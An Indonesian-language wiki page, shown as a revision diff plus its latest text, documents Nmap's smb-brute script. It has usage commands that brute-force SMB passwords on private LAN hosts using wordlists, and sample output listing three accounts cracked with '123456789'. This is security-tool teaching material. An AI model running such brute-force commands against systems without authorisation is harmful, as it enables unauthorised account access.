Nmap: brute force hack smb password: Difference between revisions
From OnnoCenterWiki
Jump to navigationJump to search
Onnowpurbo (talk | contribs) New page: Sumber: https://nmap.org/nsedoc/scripts/smb-brute.html ==File smb-brute== Script types: hostrule Categories: intrusive, brute Download: http://nmap.org/svn/scripts/smb-brute.nse ==User ... |
Onnowpurbo (talk | contribs) |
||
| (7 intermediate revisions by the same user not shown) | |||
| Line 3: | Line 3: | ||
==File smb-brute== | ==File smb-brute== | ||
Script types: hostrule | Script types: hostrule | ||
Categories: intrusive, brute | Categories: intrusive, brute | ||
Download: http://nmap.org/svn/scripts/smb-brute.nse | Download: http://nmap.org/svn/scripts/smb-brute.nse | ||
==User Summary== | ==User Summary== | ||
Upaya untuk menebak kombinasi username / password dari SMB, menyimpan kombinasi ditemukan untuk digunakan dalam skrip lainnya. Setiap upaya akan dilakukan untuk mendapatkan daftar valid dari pengguna dan untuk memverifikasi setiap nama pengguna sebelum benar-benar menggunakan mereka. Ketika nama pengguna ditemukan, selain dicetak, juga disimpan dalam registri Nmap skrip sehingga Nmap lainnya dapat menggunakannya. Itu berarti bahwa jika kita akan menjalankan smb-brute.nse, kita harus menjalankan skrip smb lain yang kita inginkan. Script ini memeriksa password dengan secara case-sensitive, menentukan kasus setelah password ditemukan, untuk Windows versi sebelum Vista. | |||
==Contoh Penggunaan== | |||
== | |||
nmap --script smb-brute.nse -p445 <host> | nmap --script smb-brute.nse -p445 <host> | ||
sudo nmap -sU -sS --script smb-brute.nse -p U:137,T:139 <host> | sudo nmap -sU -sS --script smb-brute.nse -p U:137,T:139 <host> | ||
Nmap –p445 –script smb-brute.nse –script-args userdb=user.txt,passdb=pass.txt 192.168.1.105 | |||
contoh | |||
nmap --script smb-brute.nse -p445 192.168.0.7 | |||
nmap --script smb-brute.nse -p445 192.168.0.80 | |||
nmap -sU -sS --script smb-brute.nse -p U:137,T:139 192.168.0.80 | |||
Nmap –p445 –script smb-brute.nse –script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.105 | |||
==Contoh Output== | |||
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-02-11 06:01 WIB | |||
Nmap scan report for 192.168.0.7 | |||
Host is up (0.0045s latency). | |||
Not shown: 989 closed ports | |||
PORT STATE SERVICE | |||
22/tcp open ssh | |||
80/tcp open http | |||
139/tcp open netbios-ssn | |||
443/tcp open https | |||
445/tcp open microsoft-ds | |||
873/tcp open rsync | |||
8873/tcp open dxspider | |||
9001/tcp open tor-orport | |||
9050/tcp open tor-socks | |||
9090/tcp open zeus-admin | |||
22939/tcp open unknown | |||
MAC Address: 4C:E6:76:1F:15:4C (Buffalo) | |||
Host script results: | |||
| smb-brute: | |||
| derry:123456789 => Valid credentials | |||
| onno:123456789 => Valid credentials | |||
|_ reza:123456789 => Valid credentials | |||
Nmap done: 1 IP address (1 host up) scanned in 132.91 seconds | |||
==Referensi== | ==Referensi== | ||
* https://nmap.org/nsedoc/scripts/smb-brute.html | * https://nmap.org/nsedoc/scripts/smb-brute.html | ||
Latest revision as of 03:12, 23 April 2020
Sumber: https://nmap.org/nsedoc/scripts/smb-brute.html
File smb-brute
Script types: hostrule Categories: intrusive, brute Download: http://nmap.org/svn/scripts/smb-brute.nse
User Summary
Upaya untuk menebak kombinasi username / password dari SMB, menyimpan kombinasi ditemukan untuk digunakan dalam skrip lainnya. Setiap upaya akan dilakukan untuk mendapatkan daftar valid dari pengguna dan untuk memverifikasi setiap nama pengguna sebelum benar-benar menggunakan mereka. Ketika nama pengguna ditemukan, selain dicetak, juga disimpan dalam registri Nmap skrip sehingga Nmap lainnya dapat menggunakannya. Itu berarti bahwa jika kita akan menjalankan smb-brute.nse, kita harus menjalankan skrip smb lain yang kita inginkan. Script ini memeriksa password dengan secara case-sensitive, menentukan kasus setelah password ditemukan, untuk Windows versi sebelum Vista.
Contoh Penggunaan
nmap --script smb-brute.nse -p445 <host> sudo nmap -sU -sS --script smb-brute.nse -p U:137,T:139 <host> Nmap –p445 –script smb-brute.nse –script-args userdb=user.txt,passdb=pass.txt 192.168.1.105
contoh
nmap --script smb-brute.nse -p445 192.168.0.7 nmap --script smb-brute.nse -p445 192.168.0.80 nmap -sU -sS --script smb-brute.nse -p U:137,T:139 192.168.0.80 Nmap –p445 –script smb-brute.nse –script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.105
Contoh Output
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-02-11 06:01 WIB Nmap scan report for 192.168.0.7 Host is up (0.0045s latency). Not shown: 989 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 873/tcp open rsync 8873/tcp open dxspider 9001/tcp open tor-orport 9050/tcp open tor-socks 9090/tcp open zeus-admin 22939/tcp open unknown MAC Address: 4C:E6:76:1F:15:4C (Buffalo) Host script results: | smb-brute: | derry:123456789 => Valid credentials | onno:123456789 => Valid credentials |_ reza:123456789 => Valid credentials Nmap done: 1 IP address (1 host up) scanned in 132.91 seconds